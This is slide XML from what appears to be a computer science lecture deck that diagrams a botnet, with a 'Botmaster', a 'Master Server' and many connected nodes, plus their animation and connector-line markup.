                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="163"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="106" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="163"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="107" presetID="14" presetClass="entr" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="108" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="164"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="109" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="164"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="110" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="111" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.01731 0.19745 L 0.10442 0.46389 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="112" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3074"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="4349" y="13310"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="113" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -4.375E-6 -2.96296E-6 L 0.34844 -0.09699 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="114" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="158"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="17422" y="-4861"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="115" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -4.16667E-6 5.55112E-17 L 0.21901 -0.01111 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="116" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="159"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="10951" y="-556"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="117" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 5E-6 2.59259E-6 L 0.45157 0.08472 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="118" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="160"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="22578" y="4236"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="119" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -3.33333E-6 5.55112E-17 L 0.30951 0.18704 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="120" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="161"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="15469" y="9352"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="121" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -3.125E-6 -4.81481E-6 L 0.42162 0.40348 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="122" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="162"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="21081" y="20162"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="123" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 5E-6 -4.81481E-6 L 0.25782 0.42871 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="124" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="163"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="12878" y="21250"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="125" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -3.54167E-6 -1.48148E-6 L 0.5836 0.24468 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="126" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="164"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="29180" y="1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P spid="2053"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Connector 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0150EA6-6682-4C20-B855-DF7BF56BF3CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5858655" y="2029296"/>
            <a:ext cx="2022484" cy="207487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72" name="Straight Connector 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CE2D020-9650-4932-A104-403942CB1BD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5852719" y="2075947"/>
            <a:ext cx="960831" cy="80873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71" name="Straight Connector 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC01F2B9-02DC-4350-ADF8-0D17191C3C10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="63" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5828657" y="2029297"/>
            <a:ext cx="3897284" cy="1529372"/>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75" name="Straight Connector 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3854584-61C4-4C66-AB2D-1CAE8C2753F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5895859" y="2066717"/>
            <a:ext cx="5206895" cy="2581889"/>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77" name="Straight Connector 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DC93C4C-EFF0-45E9-91D1-73BA395CC265}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5218808" y="2046154"/>
            <a:ext cx="585472" cy="280239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83" name="Straight Connector 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A595ABB-3AE3-4C61-AB53-78A2B76E3B3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5854277" y="2029298"/>
            <a:ext cx="1434373" cy="3822179"/>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86" name="Straight Connector 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EFE256D-1980-42D5-8D3C-4354DC85FE58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5892751" y="2055850"/>
            <a:ext cx="3180675" cy="374463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62" name="Straight Connector 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{388181A7-7596-4BF4-91E1-69978BC48930}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5828656" y="2000252"/>
            <a:ext cx="2596113" cy="328904"/>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26" name="Straight Connector 125">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA80BDB5-C82A-41DA-8608-E383CDD416F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4257431" y="2921015"/>
            <a:ext cx="965397" cy="1846609"/>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16" name="Straight Connector 115">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E6B4AAF-C9C7-40CF-B513-BDA48B2027FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5258366" y="2902186"/>
            <a:ext cx="1643401" cy="1865438"/>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13" name="Straight Connector 112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF1B9384-206A-4FB2-A9E1-F6D361DB4914}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5258366" y="4256475"/>
            <a:ext cx="2691749" cy="544435"/>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14" name="Straight Connector 113">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45B5A891-A7D8-494C-B312-B4C5ECBE99D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5311736" y="4848549"/>
            <a:ext cx="2082585" cy="1099007"/>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82"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484" y="4522361"/>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856CB035-4AF0-4F70-89A2-6BEC1F0C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564" y="4585223"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="135" name="Straight Connector 134">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{362DB111-83E5-4AD4-913F-8474318D7FC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4286196" y="2318824"/>
            <a:ext cx="4154188" cy="616648"/>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29" name="Straight Connector 128">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3FD83A0-050F-4E58-948E-96F2D29FC4DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4297102" y="2889343"/>
            <a:ext cx="2551154" cy="31671"/>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32" name="Straight Connector 131">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DE6C47D-BFAC-45D7-8D0B-79CB099CED0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4297102" y="2957003"/>
            <a:ext cx="3504258" cy="1301944"/>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39" name="Straight Connector 138">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F2DF72B-C36F-41FC-9474-FDE687AD5971}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4321734" y="2935472"/>
            <a:ext cx="4787559" cy="2814982"/>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45" name="Straight Connector 144">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{487910AD-3B1A-4925-BD32-9EA06C71B176}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4273744" y="3016397"/>
            <a:ext cx="5476574" cy="632106"/>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48" name="Straight Connector 147">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39639310-2D87-4D93-90DE-4905C4EE9239}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4286196" y="3002809"/>
            <a:ext cx="6896940" cy="1635682"/>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55" name="Straight Connector 154">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27C76C3E-DC48-4B34-BA70-9EB738C44A73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4286196" y="3026512"/>
            <a:ext cx="3020657" cy="2804867"/>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19" name="Straight Connector 118">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F637DB3-271B-42C7-B413-74DA1AE8DD73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4110726" y="1437883"/>
            <a:ext cx="66826" cy="1451459"/>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22" name="Straight Connector 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2EC126A-DE7E-4ABD-9D63-8FDBF88C9A2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4129188" y="1437883"/>
            <a:ext cx="1395394" cy="46166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76" name="Straight Connector 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79E01391-D87A-4210-A270-4C9F9F4616AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6956900" y="2399897"/>
            <a:ext cx="1755211" cy="518645"/>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97" name="Straight Connector 96">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{382D9DC5-46AD-43BD-830B-50CF89400FD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8638424" y="2468638"/>
            <a:ext cx="1104899" cy="109003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01" name="Straight Connector 100">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0626BEF-65AD-401F-AB13-C78E1C220E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9881246" y="3708665"/>
            <a:ext cx="1301890" cy="947975"/>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03" name="Straight Connector 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{557D0680-9560-49EF-BC86-EABED05472ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9302916" y="4767624"/>
            <a:ext cx="1954841" cy="1052954"/>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04" name="Straight Connector 103">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F1E162-528F-48B3-B6CF-EA2C6156B9DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7930462" y="4258948"/>
            <a:ext cx="1302127" cy="1443476"/>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05" name="Straight Connector 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA26BF8A-9E92-48E0-876F-523C7A8347D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7344544" y="5752927"/>
            <a:ext cx="1858575" cy="197101"/>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12" name="Straight Connector 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{845BC848-0AF2-4C6A-B853-649640DEAF0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7402338" y="4301299"/>
            <a:ext cx="558854" cy="1631508"/>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15" name="Straight Connector 114">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4463B22-CB0C-4DC0-A700-F520C6E15B75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6901767" y="2921014"/>
            <a:ext cx="1122105" cy="1294452"/>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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2534157" y="2497262"/>
            <a:ext cx="1396127" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Master Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3282900" y="362910"/>
            <a:ext cx="1485920" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Botmaster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="D:\Classes\CS 4700\assets\devil-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1079" y="738436"/>
            <a:ext cx="979261" cy="9792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Classes\CS 4700\assets\serv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9277" y="2501468"/>
            <a:ext cx="881062" cy="8810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Classes\CS 4700\assets\serv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167" y="1508813"/>
            <a:ext cx="881062" cy="8810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2482" y="2081551"/>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2353" y="5510275"/>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9852" y="441117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4622" y="2620600"/>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999" y="5624483"/>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7951" y="3304525"/>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5834" y="3992975"/>
            <a:ext cx="616648" cy="616648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2049" name="TextBox 2048"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
